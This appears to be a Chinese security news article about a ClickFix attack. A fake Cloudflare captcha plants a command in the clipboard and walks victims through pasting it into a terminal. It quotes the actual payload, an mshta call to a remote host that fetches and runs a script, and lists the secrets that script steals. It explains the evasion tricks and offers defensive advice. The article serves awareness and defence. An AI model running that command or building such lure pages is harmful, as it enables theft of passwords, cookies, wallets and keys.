导语:法国里昂创业者 Jean-Baptiste(jb_ma)近日发帖自曝差点栽在”史上最精密的假 Cloudflare 验证页”上——攻击者把整段恶意命令悄悄塞进受害者剪贴板,再用四步”操作指南”诱导他们亲手粘贴到终端执行。从 macOS 到 Windows 全平台通吃,这套 ClickFix 变种连见多识广的安全老兵都差点失手。
一、事件还原:一个资深创业者差点被骗
发帖人 Jean-Baptiste(推特账号 jb_ma)并非等闲之辈——他是里昂初创公司 @get_gustav(资产跟踪应用)的联合创始人,曾担任 WP Media(WordPress 生态知名插件厂商)的联合创始人兼 CEO,2020 年公司被收购后退居二线。就是这么一个对 Web 安全熟得不能再熟的人,在 8 月 31 日发帖坦言:”我刚撞见有史以来最先进、最恶毒的黑客攻击尝试。说实话,我差点就上当了。”

那条推文在 24 小时内拿到 120 万次曝光、3.6K 点赞,技术细节被各家安全媒体疯转。攻击本身不是 0day,而是 2024 年就开始流行的 ClickFix(点击修复)社工技术的又一次进化——但这版做得实在太像了。
二、攻击链路:四步把受害者变成自己执行者
jb_ma 用六条推文完整还原了整条攻击链路,攻击者把整套流程拆成了”看起来很合理”的四步操作指南。
第一步:复选框里藏着”小礼物”
用户在浏览一个合法但被黑的网站时,会看到熟悉的 Cloudflare “我不是机器人”复选框。视觉上完全是正版——橙色云朵 logo、灰色边框、法语版本措辞都跟 Cloudflare Turnstile(Cloudflare 的人机验证服务)一模一样。点击的瞬间,JavaScript 已经把一段精心构造的命令塞进了系统剪贴板,受害者完全不知情。
第二步:诱导打开终端
复选框勾选后,弹出一个伪造的 “Vérification humaine”(人工验证)面板,标题栏写着 Cloudflare logo,步骤写得清清楚楚:
- 按
⌘ Command + Espace(macOS)或Win + R(Windows)—— 打开系统启动器 - 输入
Terminal并回车 —— 打开终端 - 按
⌘ Command + V或Ctrl + V—— 把”验证码”粘贴进去 - 按
Entrée(回车)——”完成验证”
jb_ma 在第二条推文里直接说:”如果你不幸真的打开了终端、粘贴、回车发送,那就基本完了。”

第三步:剪贴板里到底藏了什么
jb_ma 在第三条推文里把截图公之于众。他打开 Windows 的剪贴板管理器,发现里面静静躺着 mshta http://timelevel12.com/big——这就是攻击者真正的载荷。

mshta.exe 是 Windows 自带的 HTML 应用程序宿主(Microsoft HTML Application Host),本意是让用户运行本地的 .hta 文件。但攻击者滥用它执行远程 URL——直接下载并运行远程的 HTA 脚本,全程不落地磁盘。这种技术属于经典的 LOLBin(Living Off the Land Binaries,利用系统自带工具进行攻击),绕过了绝大多数杀毒软件的下载监控。
第四步:一键榨干你的数字身份
一旦 mshta 拉下来的脚本开始执行,它会向远程服务器发起请求,把机器里能拿的全部打包外送——jb_ma 在第四条推文里列了完整清单:
- 钥匙串(macOS Keychain,存储所有密码和证书)
- 浏览器 Cookie(所有登录态、Session Token)
- 加密货币钱包(MetaMask、Phantom 等扩展)
- SSH 私钥(直接拿下整个云端资产)
jb_ma 后续补充:”脚本跑起来后,会去远程服务器把该拉的全部拉回来。”
三、红队视角:为什么这版 ClickFix 让人后背发凉
作为攻击者视角看这个变种,有三点设计真的做到了”工业级水准”:
视觉几乎零瑕疵。配色、字体、logo 摆放、按钮阴影,全部跟正版 Cloudflare Turnstile 一比一复刻。jb_ma 这样的老炮差点被骗,足以说明问题。法语版本的措辞 “Vérification humaine”、”Effectuez les étapes ci-dessous”(请按以下步骤操作)也都是 Cloudflare 真实界面里出现过的表述。
操作系统自适应。jb_ma 截图里同时出现了 macOS 风格(Command+Espace)和 Windows 风格(Win+R)的指南,意味着攻击者通过 User-Agent 嗅探(识别用户浏览器/系统信息)下发对应版本。Mac 用户用 Spotlight(macOS 启动器),Win 用户用「运行」对话框,菜单路径完全不同但视觉效果一致。
载荷用 mshta 而非 exe。传统 ClickFix 多半诱导用户下载 .exe 或 .iso 文件,容易被浏览器和杀软拦截。mshta 是 Windows 自带二十年以上的合法二进制,触发杀软告警的概率极低,且全程内存执行不写磁盘——这就是为什么即便用户装有 EDR(端点检测与响应系统),依然可能中招。
jb_ma 在推文下还透露了攻击者的具体投放点——一个挪威新闻网站 english.dvb.no(缅甸新闻报道站点)被植入攻击页面。截至他发帖时,攻击仍然在线,合法网站沦为攻击基础设施。
四、防御建议:记住这一条就够了
jb_ma 在收尾的第六条推文里把规则钉死:”没有任何验证码会让你去打开终端。如果遇到这种情况,立刻离开网站。“
这一条比任何技术防御都管用。除此之外:
- 浏览器侧:给 Chromium 系浏览器装 uBlock Origin 等扩展,可以拦截剪贴板写入操作;Chrome 用户在地址栏粘贴
mshta之类的命令时浏览器会强制要求确认”allow pasting”。 - EDR 侧:监控
mshta.exe、rundll32.exe、regsvr32.exe等 LOLBin 的网络连接和子进程行为。 - 网站主侧:jb_ma 本人作为前 WP Media CEO,多次强调 WordPress 站必须及时更新插件、强制双因素认证、配置文件完整性监控——因为 ClickFix 的最大投放渠道就是被黑的合法站点。
- 个人侧:如果只是看到这种页面,没点复选框、没打开终端,啥事没有。如果点了复选框,立刻拔网线,重启进安全模式全面排查。
这场 ClickFix 攻击没有 0day、没有漏洞利用、没有复杂免杀——它就靠一句话:”请帮我验证你是人类”。然后让你自己动手,把自己的数字生活亲手交出去。














暂无评论内容